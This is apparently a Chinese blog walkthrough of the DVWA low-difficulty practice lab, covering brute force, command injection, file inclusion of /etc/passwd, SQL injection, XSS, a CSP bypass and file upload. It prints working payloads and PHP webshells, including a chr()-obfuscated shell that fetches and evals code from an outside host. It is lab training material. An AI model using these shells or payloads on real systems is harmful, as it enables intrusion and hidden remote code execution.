DVWA简单难度

DVWA简单难度

Brute Force = 尝试登录成功

Burp抓包->发送到Intruder->猜测用户名为admin->用字典爆破
得到密码password
在这里插入图片描述

Command Injection = 尝试在服务器上列根目录

输入127.0.0.1&&ls /

File Inclusion = 尝试读取到服务器的密码

输入etc/passwd
得到

root: x:0:0:root:/root:/bin/bash daemon: x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
然后不会了。。

File Upload = 上传一个PHP木马,并连接成功

上传一句话木马<?php eval($_POST['aa']);?>
访问https://sqli-lab.practice.rois.io/hackable/uploads/1.php
在这里插入图片描述用菜刀无法连接总是出现500
百度找过狗一句话
最后找到一个可以用的

 <?php

$password='myhack58';//登录密码(支持菜刀)

//----------功能程序------------------//

$c="chr";

session_start();

if(empty($_SESSION['PhpCode'])){

$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);

$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);

$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);

$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);

$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);

$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);

$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);

$get=chr(102).chr(105).chr(108).chr(101).chr(95);

$get.=chr(103).chr(101).chr(116).chr(95).chr(99);

$get.=chr(111).chr(110).chr(116).chr(101).chr(110);

$get.=chr(116).chr(115);

$_SESSION['PhpCode']=$get($url);}

$un=$c(103).$c(122).$c(105).$c(110);

$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));

@eval($un($_SESSION['PhpCode']));

?> 

在这里插入图片描述

SQL Injection = 尝试拿到当前表名

依次输入
1’ union select 1,database()#
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’#
得到表名 guestbook,users
在这里插入图片描述

SQL Injection (Blind) = 尝试拿到当前数据库名

1.输入1’ and length(database())>4#提示不存在
输入1’ and length(database())>3#存在,所以数据库名的长度为4
2.然后用1’ and ascii(substr(database(),n,1))>100#来获得数据库名
3.最后得到数据库名为dvwa

XSS (DOM) = 尝试弹一个对话框

在这里插入图片描述
查看源代码发现上述位置可以进行XSS攻击
访问https://sqli-lab.practice.rois.io/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(0)%3C/script%3E 即可
在这里插入图片描述

XSS (Reflected) = 尝试弹一个对话框

在这里插入图片描述
输入直接输入<script>alert(0)</script>即可
在这里插入图片描述

XSS (Stored) = 尝试弹一个对话框

在这里插入图片描述直接输入<script>alert(0)</script>即可
在这里插入图片描述

CSP Bypass = 尝试弹一个对话框

查看源代码
Content-Security-Policy: script-src 'self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;

发现可以加载https://pastebin.com中的script
去https://pastebin.com发布alert(1)
在输入框中填入https://pastebin.com/raw/HLLRVw2F
成功弹出一个对话框
在这里插入图片描述

JavaScript = 尝试拿到正确的Token

提交success发现提示错误的token
看源代码发现token是在前台生成的所以只要输入success在执行一次generate_token()就可以了
在这里插入图片描述token=38581812b435834ebf84ebcc2c6424d6

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值